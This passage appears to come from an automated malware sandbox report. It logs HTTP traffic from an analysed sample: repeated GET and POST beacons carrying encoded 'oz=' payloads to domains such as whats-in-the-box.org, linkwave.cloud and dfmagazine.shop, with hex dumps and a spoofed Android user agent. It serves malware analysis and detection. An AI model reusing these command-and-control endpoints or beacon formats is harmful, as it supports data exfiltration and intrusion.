6f 66 59 59 32 35 31 64 62 54 36 69 79 67 58 71 42 65 59 51 43 71 78 6e 50 6f 74 4d 31 63 38 43 77 4a 62 57 53 57 76 32 69 68 6e 33 31 43 32 5a 4f 77 69 76 38 78 4c 30 79 51 35 59 71 77 66 44 42 4a 55 41 35 37 49 74 44 45 6a 71 6d 75 73 41 32 50 75 72 34 63 54 56 30 4a 79 58 49 54 2f 44 39 4c 4e 5a 63 43 6d 6c 43 45 55 4a 6c 69 65 68 6d 6d 74 6b 65 69 78 57 69 46 73 2b 7a 41 69 4f 73 37 4d 56 49 34 46 73 56 77 49 52 64 55 46 2f 6e 46 74 6d 39 78 75 48 65 33 69 46 6b 31 5a 6b 79 77 6d 33 41 4d 34 56 39 77 76 6f 4f 66 48 50 4b 52 76 67 51 62 4f 66 43 6c 48 4e 6a 68 35 70 41 6d 71 4c 33 31 36 6f 59 4d 6a 4b 6f 4f 36 68 65 79 55 4f 75 2f 73 74 33 45 31 48 57 46 78 54 68 35 58 66 4f 48 4d 6e 58 56 46 72 38 59 34 67 68 35 70 6d 73 43 38 58 74 79 6f 4e 42 6c 56 69 48 58 30 32 68 4d 56 52 59 33 6f 6c 75 32 6f 41 46 4c 7a 6c 43 37 6b 72 43 46 41 42 6e 48 56 55 56 66 4c 78 42 33 42 39 39 78 6e 77 59 56 78 4e 6a 4b 72 74 7a 35 63 6a 2f 47 59 4b 7a 73 66 52 7a 32 66 45 6d 64 4b 4b 45 7a 77 57 70 59 4c 6b 4c 30 53 36 38 4b 66 41 31 77 77 55 6a 34 6c 6b 43 72 41 6f 57 6e 35 61 42 74 62 46 35 47 7a 51 70 71 4c 56 67 34 4f 67 4d 2f 4f 63 51 68 5a 33 37 53 4d 6b 46 6d 75 4f 53 79 64 48 64 44 63 57 65 6d 4d 38 42 6a 41 4f 75 72 4d 47 33 4f 56 4f 30 55 72 5a 47 47 6a 4d 59 38 76 55 4d 2f 5a 58 74 6
        Source: global trafficHTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==
        Source: global trafficHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 49 35 6d 4e 6f 7a 79 49 50 63 78 30 74 45 33 37 38 67 4c 75 44 6e 6f 31 6d 76 74 59 4a 45 2b 2b 43 6a 77 4c 2f 52 6c 6c 66 44 72 2b 6f 72 30 38 45 69 62 56 56 39 32 6b 58 78 75 78 72 2b 4f 57 39 39 32 5a 6d 4c 31 75 57 55 54 2b 42 62 7a 72 43 46 75 32 4c 33 65 37 4f 6c 69 6f 49 2f 52 77 6a 55 62 73 78 41 53 54 76 54 42 6c 58 33 4b 79 67 31 5a 58 31 55 66 46 4e 36 6c 44 76 77 6a 4d 32 74 44 79 69 66 55 4b 38 73 6c 34 39 62 30 35 33 33 46 61 4f 76 42 2b 4c 69 62 47 41 62 30 52 52 4d 32 65 51 58 55 67 4e 6b 4d 76 34 3d Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=
        Source: global trafficHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 77 35 6d 2f 77 7a 30 72 58 63 77 30 74 45 2f 62 38 68 4c 75 44 6d 6f 31 2f 6d 74 59 55 7a 2b 38 36 6a 78 6f 6e 52 6b 52 7a 44 6c 2b 6f 72 32 38 45 6e 55 31 55 35 32 6b 48 39 75 31 4c 2b 4f 57 39 39 32 59 57 4c 69 76 57 55 52 2b 42 59 6e 37 43 42 2f 6d 4c 66 65 2f 62 51 69 6f 38 4a 45 51 44 55 61 4d 68 41 65 42 33 54 64 31 58 31 48 53 68 77 5a 58 35 66 66 45 6b 4c 6c 43 61 74 6a 4c 71 74 41 48 44 2f 4d 70 63 57 7a 36 46 46 78 4d 66 34 4f 73 4b 66 42 75 72 63 62 58 59 6f 34 68 31 67 6f 4e 64 44 45 6c 42 54 50 6f 74 4e 6b 6f 75 4c 52 6a 4a 78 36 70 67 44 62 36 72 74 67 58 2f 2f 2f 34 6f 34 53 37 6a 30 62 31 75 78 4e 78 61 50 6d 6b 6e 58 77 73 39 4f 50 64 65 4a 50 62 51 30 67 45 41 63 74 39 77 74 70 6e 6f 42 73 6c 57 67 71 7a 79 49 70 45 55 36 51 34 69 4b 33 6f 6a 38 65 44 63 51 59 6c 56 32 62 38 37 46 67 63 57 77 6e 31 31 35 50 6c 4b 6e 58 71 74 63 6b 64 73 70 6b 67 57 61 59 74 70 4e 5a 78 47 72 49 74 75 56 57 54 39 55 30 6c 53 32 62 4a 44 43 79 78 6e 46 49 61 77 51 79 6d 6f 6b 77 4e 52 6a 5a 67 37 41 6f 48 5a 77 68 42 61 49 79 70 6a 4b 71 44 4a 4b 69 6f 6f 70 5a 66 4b 50 52 43 69 64 48 34 63 68 6a 57 6d 48 70 4e 6c 4f 33 56 41 76 64 42 4a 77 34 47 38 66 59 30 32 76 54 45 36 4c 49 6a 38 48 59 76 66 65 77 74 68 52 4f 55 33 4f 30 36 53 2f 70 79 6f 69 33 4c 43 37 56 57 33 69 73 74 4e 59 61 62 44 54 38 55 50 6b 78 73 41 67 4d 5a 53 59 37 77 79 35 36 4c 43 4e 73 44 42 52 58 41 45 2b 63 65 41 4a 38 7a 64 4c 43 44 7a 49 2b 48 38 58 4d 76 75 6b 43 68 72 6f 63 45 30 39 6f 4a 51 49 39 49 59 63 33 32 4c 58 62 32 45 43 2b 68 6d 30 49 34 70 31 72 45 51 31 65 73 59 62 5a 38 78 4f 61 76 57 2f 39 53 43 45 6f 57 7a 62 61 35 46 78 2b 30 6c 57 74 66 4f 51 41 65 58 54 54 44 39 39 6c 43 46 63 42 36 6a 6f 34 6f 5a 6c 67 72 55 71 52 2f 41 77 4e 7a 71 66 56 41 76 39 74 38 52 30 4b 69 48 62 50 56 54 42 4e 59 66 54 53 6f 63 42 50 Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7w5m/wz0rXcw0tE/b8hLuDmo1/mtYUz+86jxonRkRzDl+or28EnU1U52kH9u1L+OW992YWLivWUR+BYn7CB/mLfe/bQio8JEQDUaMhAeB3Td1X1HShwZX5ffEkLlCatjLqtAHD/MpcWz6FFxMf4OsKfBurcbXYo4h1goNdDElBTPotNkouLRjJx6pgDb6rtgX///4o4S7j0b1uxNxaPmknXws9OPdeJPbQ0gEAct9wtpnoBslWgqzyIpEU6Q4iK3oj8eDcQYlV2b87FgcWwn115PlKnXqtckdspkgWaYtpNZxGrItuVWT9U0lS2bJDCyxnFIawQymokwN
        Source: global trafficHTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /was5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.linkwave.cloudOrigin: http://www.linkwave.cloudReferer: http://www.linkwave.cloud/was5/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6c 65 36 42 72 79 31 32 49 49 7a 76 78 62 54 6d 6b 6d 30 2b 49 54 30 42 30 67 6f 64 66 4e 72 4c 53 31 64 45 77 48 43 74 32 30 30 41 57 68 45 76 55 76 44 67 49 56 48 66 66 45 6b 7a 34 4a 64 73 30 34 39 7a 45 71 54 33 52 51 53 66 6d 78 2b 4f 49 55 6e 76 6a 6f 61 74 4d 52 62 38 62 41 33 6d 59 4f 6c 33 45 6b 51 6f 6e 45 51 67 63 37 52 32 46 78 2b 6f 38 43 53 68 43 6c 6b 56 63 2f 30 57 61 58 31 6b 6e 7a 73 30 39 63 55 6c 6a 72 6c 4e 78 39 58 52 2f 53 6f 62 56 45 38 6e 44 76 36 73 41 33 33 50 30 68 49 61 64 43 69 4e 57 53 42 79 71 38 52 43 55 67 3d 3d Data Ascii: oz=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==
        Source: global trafficHTTP traffic detected: POST /was5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.linkwave.cloudOrigin: http://www.linkwave.cloudReferer: http://www.linkwave.cloud/was5/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 50 4c 53 58 46 45 78 43 32 74 78 30 30 41 5a 42 45 75 4c 2f 44 33 49 56 43 69 66 46 30 7a 34 4e 31 73 30 35 4e 7a 48 5a 72 30 51 41 53 42 71 52 2b 49 56 45 6e 76 6a 6f 61 74 4d 52 50 47 62 45 62 6d 59 39 74 33 45 47 30 6e 6b 45 51 76 66 37 52 32 53 68 2b 73 38 43 54 45 43 67 41 76 63 39 38 57 61 56 74 6b 6d 69 73 37 6f 4d 55 6a 38 37 6b 6c 34 4d 69 6f 31 52 63 79 61 30 4d 43 42 63 2b 72 42 68 6d 56 70 54 38 2b 65 52 2b 2f 53 69 34 61 6f 2b 51 5a 4a 67 2f 4f 33 39 6a 72 67 61 4f 42 36 75 48 50 56 44 2b 66 46 36 6b 3d Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=
        Source: global trafficHTTP traffic detected: POST /was5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.linkwave.cloudOrigin: http://www.linkwave.cloudReferer: http://www.linkwave.cloud/was5/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 48 4c 53 45 4e 45 77 6c 61 74 77 30 30 41 51 68 45 56 4c 2f 44 32 49 52 75 75 66 46 34 4a 34 4c 78 73 6d 50 52 7a 50 4d 48 30 61 41 53 42 33 42 2b 4a 49 55 6e 66 6a 6f 4b 70 4d 52 66 47 62 45 62 6d 59 38 39 33 43 55 51 6e 69 45 51 67 63 37 52 71 46 78 2b 49 38 43 37 2b 43 68 42 59 64 4e 63 57 62 31 39 6b 6b 55 41 37 31 38 55 68 39 37 6b 39 34 4d 2b 4a 31 52 51 45 61 30 34 34 42 66 4f 72 41 41 50 36 37 58 6f 39 4c 42 71 39 59 7a 45 58 6b 38 5a 48 4a 44 7a 73 33 72 7a 64 68 66 47 4d 37 76 48 75 53 69 6e 55 53 2b 4d 51 73 67 65 77 4f 49 50 76 52 2f 51 45 58 54 2f 61 52 65 67 70 55 6c 42 33 52 59 66 6b 61 58 6b 6f 36 57 45 48 66 78 54 45 78 36 4f 2b 6d 71 44 6c 43 6e 34 53 52 66 57 6e 71 47 57 70 67 73 51 41 6e 56 35 65 55 33 6a 56 49 69 36 2b 77 43 55 4c 58 6e 37 59 44 51 41 59 36 2f 37 73 43 50 6b 78 35 7a 49 4a 56 50 67 62 43 38 64 67 62 47 4c 43 66 7a 6b 70 31 52 57 5a 62 55 70 6f 75 6c 32 76 63 31 37 41 72 57 41 6a 42 50 38 46 6f 4d 7a 56 4f 43 6c 36 4e 59 71 4c 41 54 55 6a 68 68 73 41 47 47 59 35 59 47 4a 6d 67 44 36 37 41 52 62 4a 78 2f 78 50 59 56 53 6c 6c 47 71 4a 4f 48 46 75 55 68 6e 63 4f 79 6c 39 6b 59 42 59 62 74 4d 50 75 2f 78 6f 33 79 55 52 47 75 62 78 54 6e 75 6d 59 34 30 49 43 66 48 43 61 6e 36 37 6c 79 4f 63 68 52 33 5a 38 59 78 32 6a 4b 64 48 61 63 79 41 37 47 68 48 2f 65 4c 41 59 34 4f 32 39 48 35 70 38 45 38 49 71 6c 51 45 4b 73 46 45 52 62 39 69 69 51 62 41 35 50 62 39 6d 6a 62 4f 48 36 48 6c 4c 63 6f 4c 4b 47 72 39 2f 2f 79 36 79 51 4d 68 30 37 75 63 41 4a 6e 4a 53 59 52 75 65 75 6d 53 5a 61 59 42 42 58 6f 54 58 54 33 2f 4f 7a 63 55 30 4e 51 75 53 7a 46 5a 48 4f 56 55 4b 59 58 4d 30 4d 62 74 43 37 4e 4e 6f 68 45 39 43 39 5a 76 48 39 49 56 67 47 6b 50 67 48 74 69 4e 30 5a 52 55 4b 45 42 78 71 72 32 39 62 75 69 39 5a 4e 4a 49 70 55 44 51 2f 6c 46 32 51 68 54 68 2f 33 49 4f 72 53 6e 4f 61 67 41 6c 4b 50 54 6d 4e 74 7a 2f 4c 47 4a 31 42 4f Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+HLSENEwlatw00AQhEVL/D2IRuufF4J4LxsmPRzPMH0aASB3B+JIUnfjoKpMRfGbEbmY893CUQniEQgc7RqFx+I8C7+ChBYdNcWb19kkUA718Uh97k94M+J1RQEa044BfOrAAP67Xo9LBq9YzEXk8ZHJDzs3rzdhfGM7vHuSinUS+MQsgewOIPvR/QEXT/aRegpUlB3RYfkaXko6WEHfxTEx6O+mqDlCn4SRfWnqGWpgsQAnV5eU3jVIi6+wCULXn7YDQAY6/7sCPkx5zIJVPgbC8dgbGLCfzkp1RWZbU
        Source: global trafficHTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /7k8f/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopOrigin: http://www.dfmagazine.shopReferer: http://www.dfmagazine.shop/7k8f/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4d 70 75 50 44 42 76 4e 76 79 58 6c 30 6a 39 37 54 75 33 75 5a 4d 79 45 35 75 36 65 41 72 77 41 33 49 7a 2f 64 67 6d 35 78 76 39 39 4f 59 7a 75 46 70 47 77 2b 77 61 6c 61 6e 71 4a 41 69 64 2f 70 6d 44 43 34 79 34 72 48 43 44 69 41 56 41 32 6d 50 73 69 36 58 6f 74 42 6d 35 63 65 34 44 31 72 6a 73 31 38 42 70 49 61 6e 4a 55 47 70 77 79 55 45 4b 76 44 33 46 69 70 74 4a 42 62 71 6b 56 79 57 34 4b 34 4a 62 4e 43 68 56 77 4f 36 55 75 55 78 72 36 39 34 54 35 6c 38 54 52 32 41 32 52 70 77 30 56 64 6f 34 38 4d 42 44 45 66 38 52 35 50 49 65 4a 52 77 3d 3d Data Ascii: oz=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==
        Source: global trafficHTTP traffic detected: POST /7k8f/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopOrigin: http://www.dfmagazine.shopReferer: http://www.dfmagazine.shop/7k8f/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 49 41 77 6f 44 2f 63 68 6d 35 30 76 39 39 4a 6f 7a 76 42 70 47 2f 2b 77 65 74 61 6d 57 4a 41 69 4a 2f 70 6d 54 43 35 44 34 6f 42 53 44 67 50 31 41 30 70 76 73 69 36 58 6f 74 42 6e 64 32 65 34 4c 31 6f 54 63 31 75 77 70 48 5a 6e 4a 62 4d 4a 77 79 44 30 4b 72 44 33 45 4e 70 73 55 6b 62 76 34 56 79 58 49 4b 35 62 7a 4f 49 68 56 36 45 61 56 35 54 51 79 4b 34 4d 32 4d 6b 39 4b 44 2f 6c 4b 4d 73 6d 6c 50 41 61 4d 59 50 53 66 32 62 4d 6f 52 4e 4b 66 53 4d 36 58 76 33 7a 54 50 36 4c 58 79 77 53 67 61 74 32 4d 54 37 70 67 3d Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=
        Source: global trafficHTTP traffic detected: POST /7k8f/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopOrigin: http://www.dfmagazine.shopReferer: http://www.dfmagazine.shop/7k8f/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 41 41 77 62 4c 2f 64 47 61 35 33 76 39 39 4b 6f 7a 79 42 70 47 69 2b 32 32 70 61 6d 62 2b 41 67 78 2f 6d 6c 4c 43 2b 77 67 6f 50 53 44 67 58 31 41 33 6d 50 73 33 36 54 30 68 42 6d 74 32 65 34 4c 31 6f 51 45 31 74 68 70 48 56 48 4a 55 47 70 77 2b 55 45 4b 50 44 33 4d 33 70 73 51 61 63 62 30 56 79 33 59 4b 30 50 54 4f 45 68 56 38 48 61 56 78 54 51 4f 56 34 49 66 31 6b 39 50 59 2f 6a 75 4d 74 78 67 70 5a 49 4a 50 64 41 6e 47 52 63 55 51 45 34 57 43 44 72 44 57 78 41 33 5a 7a 2b 66 45 38 53 63 4d 39 33 63 34 35 75 75 6e 61 61 5a 66 45 4e 64 75 77 68 2b 67 69 7a 72 53 4d 4e 2b 4a 4c 6c 67 32 42 38 6b 6b 6d 2f 58 2b 63 76 75 4e 76 6c 63 64 59 4f 52 4b 54 54 6e 4d 47 6d 4a 62 34 57 69 79 38 35 57 49 4c 30 66 43 54 42 42 30 33 44 46 78 32 74 6a 38 65 52 6b 51 51 43 77 56 73 68 2f 63 34 37 4e 51 78 5a 78 53 71 51 4c 48 78 51 51 47 58 38 55 35 51 79 71 4a 47 48 54 2b 64 2f 31 64 50 45 33 59 63 59 69 46 44 41 48 71 30 44 63 59 4c 72 39 78 4b 4b 6c 71 72 6f 74 4c 4b 48 50 74 4b 4d 33 63 55 4a 44 50 7a 38 4e 39 64 37 77 7a 61 4e 63 33 35 36 76 4e 6c 57 38 4a 49 4c 4c 57 76 4e 59 71 54 42 6a 33 52 56 2b 67 46 5a 69 4a 79 71 6e 67 53 67 44 70 78 61 6f 67 2b 76 67 41 36 4b 47 2f 6c 62 6e 45 4d 49 72 48 62 70 4b 30 75 4e 6e 70 56 74 65 4b 79 66 41 39 5a 6d 79 72 35 61 33 42 4b 76 50 34 33 5a 69 66 72 71 55 69 33 31 49 58 64 50 66 4c 76 56 72 69 64 6a 50 36 2f 70 5a 6e 59 6c 45 63 4d 72 30 6c 4c 78 6a 6b 59 73 61 68 51 46 75 55 67 7a 7a 2b 33 39 55 41 2f 2b 36 66 32 4d 62 6c 5a 48 59 46 42 6d 55 50 69 5a 50 49 6d 75 4c 56 65 74 31 39 4f 52 6c 52 7a 39 58 67 77 6b 72 59 34 54 49 68 71 4f 45 7a 6d 58 65 2b 66 47 71 50 4a 54 55 66 79 63 59 74 36 61 2b 54 70 6e 64 4e 33 56 4a 63 64 4a 55 45 74 52 2b 54 2b 6b 50 30 52 44 77 72 75 32 48 50 46 55 57 58 7a 6d 67 6f 33 52 75 61 4c 68 56 4d 33 67 76 67 2f 32 59 2b 75 77 66 38 46 4f 51 44 69 4d 7a 37 2b 47 4e 41 48 2b 66 75 4f 36 6e 4f 53 44 4b 55 2f 61 77 6a 62 49 55 57 5a 46 31 47 46 53 70 6d 39 52 75 5a 30 32 38 62 43 39 30 32 68 71 53 6f 6d 57 6f 75 4e 4a 43 4b 59 68 31 4c 6b 35 79 6e 38 68 4e 32 73 69 78 39 62 62 6f 66 73 79 63 58 66 43 4b 61 35 76 43 6a 41 44 42 64 79 58 6c 31 41 56 46 77 6c 56 75 73 66 43 73 5a 6f 76 36 6a 4a 39 69 73 55 66 35 57 6c 72 62 61 79 59 55 51 2
